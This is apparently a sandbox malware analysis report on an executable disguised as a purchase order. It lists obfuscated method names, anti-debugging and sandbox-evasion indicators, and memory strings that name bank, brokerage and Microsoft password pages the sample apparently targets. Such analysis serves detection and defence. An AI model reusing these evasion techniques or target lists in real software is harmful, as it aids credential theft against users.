                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, KPqRVFnR9qVYFUlZ6d.csHigh entropy of concatenated method names: 'Dispose', 'cckpT9EtfY', 'Pjy4Y5qLog', 'SeNcdy9vSY', 'OvjpJXjYwX', 'jEIpzrfZsZ', 'ProcessDialogKey', 'DLJ4m0B2qF', 'jrt4p8fYDn', 'SPx440As1a'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, d6Aj8GVImyFAcxMBFf.csHigh entropy of concatenated method names: 't5YOZQL2Eg', 'k0TOnPqLot', 'StxOGt3CH5', 'EbWOMubSxb', 'oNoOjZEmL6', 'VZJGNi0rnm', 'kZ0GkJla1Q', 'DXKGUULCf4', 'bMJG6grfQZ', 'MMDGT1wjDu'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, GtuFjRoxKwyrNHePV1.csHigh entropy of concatenated method names: 'qjVMy3LT5d', 'BrxMExlbyL', 'I7DMXTLg5c', 'ryKMwVX6NV', 'tGvMAIv0hQ', 'giHMuxuHrf', 'bGKMCRcwJX', 'H72ML2X9iY', 'Vr4M29v3o7', 'FRKMh2wwyA'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, PES2NXhRnw5g51v5YQ.csHigh entropy of concatenated method names: 'UkIGAL5WfA', 'wSeGCQMW9j', 'wq78eOSovr', 'WpM8iMxmQr', 'Bvx8tpi3wY', 'f2U8SiH5I8', 'Gx78rr3kOG', 'UN6816NCws', 'nna8o2dq5h', 'alB8W40uLZ'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, lvls2PpmaQGhXtwDDue.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'iqRbshJwS1', 'LubbQxHyx5', 'NBQbxBpi5l', 'wN0b03NhRt', 'RHobqVv6Yg', 'v0WbIcQPIn', 've8bRiLKV1'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, AQJoCpxtIOGQRBSeCG.csHigh entropy of concatenated method names: 'FPM3LdEEUI', 'ogg32NH4vF', 'rIU3V87vgs', 'nWV3YYIpY0', 'bNN3ihTEJ3', 'jh53trIJwQ', 'qrO3rgEHxe', 'NQY31RLrDL', 'RPn3W7M1k1', 's6f3scXGqW'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, laawxFRaVYS1lM36q8.csHigh entropy of concatenated method names: 'zi8dHEE0QD', 'RY0dBRqde7', 'ToString', 'HORdKETaPo', 'o5tdn27Pwg', 'vVYd8rAIj6', 'St7dGvI37J', 'Oo4dOiCtTm', 'rrvdMOep1D', 's10djeFMeO'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, bdSd1r2Rq4aulnjYSv.csHigh entropy of concatenated method names: 'SZ38wVkvYw', 'boE8u9nEJG', 'gAO8Leoru2', 'zQ282uZpa9', 'SVO8f93Qlc', 'eDJ85pQI0N', 'isP8dTIjd6', 'dBp8aQ9Ni4', 'JeS8lJZFXK', 'xJf8bVDyLW'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, wEJoIGcYhcR48eX1BO.csHigh entropy of concatenated method names: 'eEtpMHAOCX', 'hd4pjWkGTv', 'LRqpH4auln', 'kYSpBvQES2', 'Lv5pfYQc6A', 'k8Gp5ImyFA', 'l0DRrBTw959hnXBSih', 'UMUxUAQwlO1t6L2R30', 'wnZppct28e', 'ABjpDIsFb8'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, bkeWOAkPCVNdnRElIs.csHigh entropy of concatenated method names: 'qQOd65bero', 'l1hdJ8KhMq', 'KfQamDOle7', 'Rv2apj1qmN', 'xJ7ds0Upgj', 'BYOdQJQ90Z', 'TrYdxMXOYp', 'dObd0iDaVt', 'iZ8dqFuu22', 'XjQdIwMHQo'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, sxpLOmU1xDck9EtfYs.csHigh entropy of concatenated method names: 'coIlfolDLN', 'R1eldoElc3', 'ABRllmJthM', 'c36lF9ilh5', 'zualvs9Gpo', 'ds3lPP0tQe', 'Dispose', 'j4aaKGQ3aZ', 'QP6anCDuQV', 'Fo3a8fk5PG'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, p3up78ppxv5lhJ5wrLo.csHigh entropy of concatenated method names: 'qX1bJL8Acp', 'r6LbzCVZOU', 'PbZFmILoLa', 'diNFpO4wxZ', 'J7ZF4rxFXO', 'j3nFDYQ6ff', 'Yn8Fc1od1M', 'DJ5FZBSg2m', 'YypFKALw24', 'vhTFnEKcib'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, JHAOCXLGd4WkGTvkMx.csHigh entropy of concatenated method names: 'lgVn0ypJb1', 'wCRnqg5gWE', 'NqvnIdcmSa', 'HJwnRrmXvF', 'p8EnNeS4qu', 'XPYnk0uuYm', 'T25nUtGoNZ', 'BMJn6Tl8q9', 'SGMnTU97Ms', 'CKHnJn6LfC'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, KFwuvsj5SicMBvK28o.csHigh entropy of concatenated method names: 'bE3DZ3dAmL', 'htXDKUQOPY', 'rpkDn5L5Zh', 'QHSD8btFsw', 'NToDGd9Tk5', 'L9yDOHkIph', 'mTeDMvko4r', 'uMVDjwTpBm', 'hKxD7RCt1C', 'FcxDHpumDW'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, RAs1axJvnF10Pv6eKl.csHigh entropy of concatenated method names: 'eKYb82Tycv', 'S38bG7ZFGg', 'NYObOTj10d', 'L9RbMA6lt5', 'hcGblY0nTy', 'kw4bjhHd0E', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, f1LjevILsq0YbrjDQs.csHigh entropy of concatenated method names: 'ToString', 'lGS5scoV80', 'SyA5YKXdEt', 'MlE5eVr38Q', 'RbA5iibl2W', 'tfk5tJcfH7', 'MnE5SHfMaT', 'Trd5reTaMS', 'SoY51mbQjb', 'AN05oJpd72'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, Y0B2qFTOrt8fYDnIPx.csHigh entropy of concatenated method names: 'QG1lVqC9YF', 'fxKlYAA5x5', 'PRpleeR3qV', 'HPjlii97tp', 'JvRltDoLGT', 'BlUlSmsI1n', 'epYlrIJhBT', 'k7Cl15bHAb', 'SsfloYcCYb', 'hrWlWZ17Ts'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, r9iVkW4yai1QaYMql0.csHigh entropy of concatenated method names: 'jg3XJwBDf', 'AXnwmu7q5', 'QcDumWv43', 'lTsCGPy6a', 'wny2WeymT', 'C8dhyWiel', 'p298q8MmQfcMcV29D1', 'PFHlE3jHI4ShiuX8p5', 'I1baypfKB', 'AdLb0SGVD'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, mP6s57zjbNgGXm0Y7p.csHigh entropy of concatenated method names: 'Vembur2B0n', 'uHIbL7VhLP', 'hfHb2yNbwo', 'Ui2bV7LjAh', 'rAWbYbNVr0', 'NsrbilRyFb', 'aEgbtCQy7c', 'J5ZbPD6KfG', 'R6Ubyod3ua', 'XNqbETed2q'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, iVuwKopcqJDeTOo64RM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lW29lEeHfi', 'mUr9bIG0iw', 'Y3h9F4GfDa', 'UDa99USKEN', 'PD69vu15kq', 'VXN9gZpqRw', 'OsE9P3JFbR'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, hs9Nap8aXLO5OZoZk9.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'xnb4TV2VAx', 'xZo4JK4EaS', 'fBE4zgeYhk', 'iPZDmHXW0k', 'sPGDphrdHd', 'FSXD4OskJx', 'TVZDD3qWKp', 'OXN6qSt0HoPgVTXkjuD'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, KPqRVFnR9qVYFUlZ6d.csHigh entropy of concatenated method names: 'Dispose', 'cckpT9EtfY', 'Pjy4Y5qLog', 'SeNcdy9vSY', 'OvjpJXjYwX', 'jEIpzrfZsZ', 'ProcessDialogKey', 'DLJ4m0B2qF', 'jrt4p8fYDn', 'SPx440As1a'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, d6Aj8GVImyFAcxMBFf.csHigh entropy of concatenated method names: 't5YOZQL2Eg', 'k0TOnPqLot', 'StxOGt3CH5', 'EbWOMubSxb', 'oNoOjZEmL6', 'VZJGNi0rnm', 'kZ0GkJla1Q', 'DXKGUULCf4', 'bMJG6grfQZ', 'MMDGT1wjDu'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, GtuFjRoxKwyrNHePV1.csHigh entropy of concatenated method names: 'qjVMy3LT5d', 'BrxMExlbyL', 'I7DMXTLg5c', 'ryKMwVX6NV', 'tGvMAIv0hQ', 'giHMuxuHrf', 'bGKMCRcwJX', 'H72ML2X9iY', 'Vr4M29v3o7', 'FRKMh2wwyA'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, PES2NXhRnw5g51v5YQ.csHigh entropy of concatenated method names: 'UkIGAL5WfA', 'wSeGCQMW9j', 'wq78eOSovr', 'WpM8iMxmQr', 'Bvx8tpi3wY', 'f2U8SiH5I8', 'Gx78rr3kOG', 'UN6816NCws', 'nna8o2dq5h', 'alB8W40uLZ'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, lvls2PpmaQGhXtwDDue.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'iqRbshJwS1', 'LubbQxHyx5', 'NBQbxBpi5l', 'wN0b03NhRt', 'RHobqVv6Yg', 'v0WbIcQPIn', 've8bRiLKV1'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, AQJoCpxtIOGQRBSeCG.csHigh entropy of concatenated method names: 'FPM3LdEEUI', 'ogg32NH4vF', 'rIU3V87vgs', 'nWV3YYIpY0', 'bNN3ihTEJ3', 'jh53trIJwQ', 'qrO3rgEHxe', 'NQY31RLrDL', 'RPn3W7M1k1', 's6f3scXGqW'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, laawxFRaVYS1lM36q8.csHigh entropy of concatenated method names: 'zi8dHEE0QD', 'RY0dBRqde7', 'ToString', 'HORdKETaPo', 'o5tdn27Pwg', 'vVYd8rAIj6', 'St7dGvI37J', 'Oo4dOiCtTm', 'rrvdMOep1D', 's10djeFMeO'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, bdSd1r2Rq4aulnjYSv.csHigh entropy of concatenated method names: 'SZ38wVkvYw', 'boE8u9nEJG', 'gAO8Leoru2', 'zQ282uZpa9', 'SVO8f93Qlc', 'eDJ85pQI0N', 'isP8dTIjd6', 'dBp8aQ9Ni4', 'JeS8lJZFXK', 'xJf8bVDyLW'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, wEJoIGcYhcR48eX1BO.csHigh entropy of concatenated method names: 'eEtpMHAOCX', 'hd4pjWkGTv', 'LRqpH4auln', 'kYSpBvQES2', 'Lv5pfYQc6A', 'k8Gp5ImyFA', 'l0DRrBTw959hnXBSih', 'UMUxUAQwlO1t6L2R30', 'wnZppct28e', 'ABjpDIsFb8'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, bkeWOAkPCVNdnRElIs.csHigh entropy of concatenated method names: 'qQOd65bero', 'l1hdJ8KhMq', 'KfQamDOle7', 'Rv2apj1qmN', 'xJ7ds0Upgj', 'BYOdQJQ90Z', 'TrYdxMXOYp', 'dObd0iDaVt', 'iZ8dqFuu22', 'XjQdIwMHQo'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, sxpLOmU1xDck9EtfYs.csHigh entropy of concatenated method names: 'coIlfolDLN', 'R1eldoElc3', 'ABRllmJthM', 'c36lF9ilh5', 'zualvs9Gpo', 'ds3lPP0tQe', 'Dispose', 'j4aaKGQ3aZ', 'QP6anCDuQV', 'Fo3a8fk5PG'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, p3up78ppxv5lhJ5wrLo.csHigh entropy of concatenated method names: 'qX1bJL8Acp', 'r6LbzCVZOU', 'PbZFmILoLa', 'diNFpO4wxZ', 'J7ZF4rxFXO', 'j3nFDYQ6ff', 'Yn8Fc1od1M', 'DJ5FZBSg2m', 'YypFKALw24', 'vhTFnEKcib'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, JHAOCXLGd4WkGTvkMx.csHigh entropy of concatenated method names: 'lgVn0ypJb1', 'wCRnqg5gWE', 'NqvnIdcmSa', 'HJwnRrmXvF', 'p8EnNeS4qu', 'XPYnk0uuYm', 'T25nUtGoNZ', 'BMJn6Tl8q9', 'SGMnTU97Ms', 'CKHnJn6LfC'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, KFwuvsj5SicMBvK28o.csHigh entropy of concatenated method names: 'bE3DZ3dAmL', 'htXDKUQOPY', 'rpkDn5L5Zh', 'QHSD8btFsw', 'NToDGd9Tk5', 'L9yDOHkIph', 'mTeDMvko4r', 'uMVDjwTpBm', 'hKxD7RCt1C', 'FcxDHpumDW'
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara matchFile source: Process Memory Space: Hire P.O.exe PID: 7872, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D324
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D7E4
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D944
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D504
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D544
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D1E4
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFEFE530154
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFEFE52DA44
                Source: C:\Users\user\Desktop\Hire P.O.exeMemory allocated: 27E0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Hire P.O.exeMemory allocated: 2A10000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Hire P.O.exeMemory allocated: 2840000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Hire P.O.exeMemory allocated: 8E50000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Hire P.O.exeMemory allocated: 9E50000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Hire P.O.exeMemory allocated: A060000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Hire P.O.exeMemory allocated: B060000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0110096E rdtsc 5_2_0110096E
                Source: C:\Users\user\Desktop\Hire P.O.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\Hire P.O.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\fc.exeAPI coverage: 2.8 %
                Source: C:\Users\user\Desktop\Hire P.O.exe TID: 7892Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\fc.exe TID: 3268Thread sleep count: 35 > 30
                Source: C:\Windows\SysWOW64\fc.exe TID: 3268Thread sleep time: -70000s >= -30000s
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe TID: 8036Thread sleep time: -50000s >= -30000s
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe TID: 8036Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0050C500 FindFirstFileW,FindNextFileW,FindClose,7_2_0050C500
                Source: 0349A-n.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
                Source: fc.exe, 00000007.00000002.3139261279.0000000000640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB bLe
                Source: 0349A-n.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                Source: fc.exe, 00000007.00000002.3143948984.00000000077F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20
                Source: 0349A-n.7.drBinary or memory string: tasks.office.comVMware20,11696503903o
                Source: 0349A-n.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
                Source: fc.exe, 00000007.00000002.3143948984.00000000077F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: active Brokers - COM.HKVMware20,11696503903
                Source: fc.exe, 00000007.00000002.3143948984.00000000077F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20
                Source: 0349A-n.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
                Source: 0349A-n.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
                Source: 0349A-n.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
                Source: 0349A-n.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
                Source: fc.exe, 00000007.00000002.3143948984.00000000077F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696503903"E
                Source: 0349A-n.7.drBinary or memory string: bankofamerica.comVMware20,11696503903x
                Source: 0349A-n.7.drBinary or memory string: global block list test formVMware20,11696503903
                Source: 0349A-n.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
                Source: 0349A-n.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
                Source: 0349A-n.7.drBinary or memory string: ms.portal.azure.comVMware20,11696503903
                Source: 0349A-n.7.drBinary or memory string: interactivebrokers.comVMware20,11696503903
                Source: 0349A-n.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
                Source: 0349A-n.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
                Source: 0349A-n.7.drBinary or memory string: AMC password management pageVMware20,11696503903
                Source: 0349A-n.7.drBinary or memory string: turbotax.intuit.comVMware20,11696503903t
                Source: fc.exe, 00000007.00000002.3143948984.00000000077F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tVMware20,11696503903
                Source: zKwhguHavy.exe, 0000000A.00000002.3140072304.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.2231226439.0000024077D6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 0349A-n.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
                Source: 0349A-n.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
                Source: fc.exe, 00000007.00000002.3143948984.00000000077F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nge Transaction PasswordVMware20,11696503903^
                Source: Hire P.O.exe, 00000001.00000002.1528745888.0000000008770000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: rZvMciZcw2
                Source: 0349A-n.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
                Source: fc.exe, 00000007.00000002.3143948984.00000000077F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,14D
                Source: 0349A-n.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
                Source: 0349A-n.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
                Source: 0349A-n.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
                Source: 0349A-n.7.drBinary or memory string: outlook.office365.comVMware20,11696503903t
                Source: fc.exe, 00000007.00000002.3143948984.00000000077F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tive Brokers - non-EU EuropeVMware20,11696503903
                Source: 0349A-n.7.drBinary or memory string: outlook.office.comVMware20,11696503903s
                Source: 0349A-n.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
                Source: fc.exe, 00000007.00000002.3143948984.00000000077F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EtVMware20,11696503903
                Source: 0349A-n.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
                Source: 0349A-n.7.drBinary or memory string: discord.comVMware20,11696503903f
                Source: 0349A-n.7.drBinary or memory string: dev.azure.comVMware20,11696503903j
                Source: 0349A-n.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
                Source: fc.exe, 00000007.00000002.3143948984.00000000077F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n PasswordVMware20,11696503903x
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\fc.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_00417793 LdrLoadDll,5_2_00417793
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01144755 mov eax, dword ptr fs:[00000030h]5_2_01144755
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F674D mov esi, dword ptr fs:[00000030h]5_2_010F674D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F674D mov eax, dword ptr fs:[00000030h]5_2_010F674D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F674D mov eax, dword ptr fs:[00000030h]5_2_010F674D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114E75D mov eax, dword ptr fs:[00000030h]5_2_0114E75D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C0750 mov eax, dword ptr fs:[00000030h]5_2_010C0750
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C8770 mov eax, dword ptr fs:[00000030h]5_2_010C8770
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D0770 mov eax, dword ptr fs:[00000030h]5_2_010D0770
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D0770 mov eax, dword ptr fs:[00000030h]5_2_010D0770
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D0770 mov eax, dword ptr fs:[00000030h]5_2_010D0770
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D0770 mov eax, dword ptr fs:[00000030h]5_2_010D0770
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D0770 mov eax, dword ptr fs:[00000030h]5_2_010D0770
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D0770 mov eax, dword ptr fs:[00000030h]5_2_010D0770
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D0770 mov eax, dword ptr fs:[00000030h]5_2_010D0770
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D0770 mov eax, dword ptr fs:[00000030h]5_2_010D0770
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D0770 mov eax, dword ptr fs:[00000030h]5_2_010D0770
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D0770 mov eax, dword ptr fs:[00000030h]5_2_010D0770
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D0770 mov eax, dword ptr fs:[00000030h]5_2_010D0770
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D0770 mov eax, dword ptr fs:[00000030h]5_2_010D0770
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0116678E mov eax, dword ptr fs:[00000030h]5_2_0116678E
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C07AF mov eax, dword ptr fs:[00000030h]5_2_010C07AF
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CC7C0 mov eax, dword ptr fs:[00000030h]5_2_010CC7C0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011407C3 mov eax, dword ptr fs:[00000030h]5_2_011407C3
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E27ED mov eax, dword ptr fs:[00000030h]5_2_010E27ED
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E27ED mov eax, dword ptr fs:[00000030h]5_2_010E27ED
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E27ED mov eax, dword ptr fs:[00000030h]5_2_010E27ED
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114E7E1 mov eax, dword ptr fs:[00000030h]5_2_0114E7E1
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C47FB mov eax, dword ptr fs:[00000030h]5_2_010C47FB
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C47FB mov eax, dword ptr fs:[00000030h]5_2_010C47FB
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102619 mov eax, dword ptr fs:[00000030h]5_2_01102619
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113E609 mov eax, dword ptr fs:[00000030h]5_2_0113E609
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C262C mov eax, dword ptr fs:[00000030h]5_2_010C262C
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010DE627 mov eax, dword ptr fs:[00000030h]5_2_010DE627
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F6620 mov eax, dword ptr fs:[00000030h]5_2_010F6620
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F8620 mov eax, dword ptr fs:[00000030h]5_2_010F8620
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010DC640 mov eax, dword ptr fs:[00000030h]5_2_010DC640
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FA660 mov eax, dword ptr fs:[00000030h]5_2_010FA660
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FA660 mov eax, dword ptr fs:[00000030h]5_2_010FA660
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118866E mov eax, dword ptr fs:[00000030h]5_2_0118866E
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118866E mov eax, dword ptr fs:[00000030h]5_2_0118866E
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F2674 mov eax, dword ptr fs:[00000030h]5_2_010F2674
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C4690 mov eax, dword ptr fs:[00000030h]5_2_010C4690
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C4690 mov eax, dword ptr fs:[00000030h]5_2_010C4690
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FC6A6 mov eax, dword ptr fs:[00000030h]5_2_010FC6A6
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F66B0 mov eax, dword ptr fs:[00000030h]5_2_010F66B0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FA6C7 mov ebx, dword ptr fs:[00000030h]5_2_010FA6C7
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FA6C7 mov eax, dword ptr fs:[00000030h]5_2_010FA6C7
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113E6F2 mov eax, dword ptr fs:[00000030h]5_2_0113E6F2
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113E6F2 mov eax, dword ptr fs:[00000030h]5_2_0113E6F2
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113E6F2 mov eax, dword ptr fs:[00000030h]5_2_0113E6F2
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113E6F2 mov eax, dword ptr fs:[00000030h]5_2_0113E6F2
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011406F1 mov eax, dword ptr fs:[00000030h]5_2_011406F1
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011406F1 mov eax, dword ptr fs:[00000030h]5_2_011406F1
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114C912 mov eax, dword ptr fs:[00000030h]5_2_0114C912
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010B8918 mov eax, dword ptr fs:[00000030h]5_2_010B8918
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010B8918 mov eax, dword ptr fs:[00000030h]5_2_010B8918
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113E908 mov eax, dword ptr fs:[00000030h]5_2_0113E908
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113E908 mov eax, dword ptr fs:[00000030h]5_2_0113E908
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114892A mov eax, dword ptr fs:[00000030h]5_2_0114892A
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0115892B mov eax, dword ptr fs:[00000030h]5_2_0115892B
